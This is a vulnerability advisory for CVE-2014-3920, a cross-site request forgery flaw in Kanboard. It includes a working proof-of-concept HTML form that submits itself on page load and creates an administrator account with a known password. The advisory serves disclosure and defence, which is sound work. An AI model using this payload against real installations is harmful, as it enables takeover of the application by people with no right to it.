High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.
1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920
The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges.
Simple CSRF exploit below creates new admin account with login “immuniweb” and password “password”:
<form action=“http://kanboard/?controller=user&action=save” method=“post” name=“main”>
<input type=“hidden” name=“username” value=“immuniweb”>
<input type=“hidden” name=“name” value=“name”>
<input type=“hidden” name=“email” value="[email protected]">
<input type=“hidden” name=“password” value=“password”>
<input type=“hidden” name=“confirmation” value=“password”>
<input type=“hidden” name=“default_project_id” value=“0”>
<input type=“hidden” name=“is_admin” value=“1”>
<input type=“submit” id=“btn”>
</form>
<script>
document.main.submit();
</script>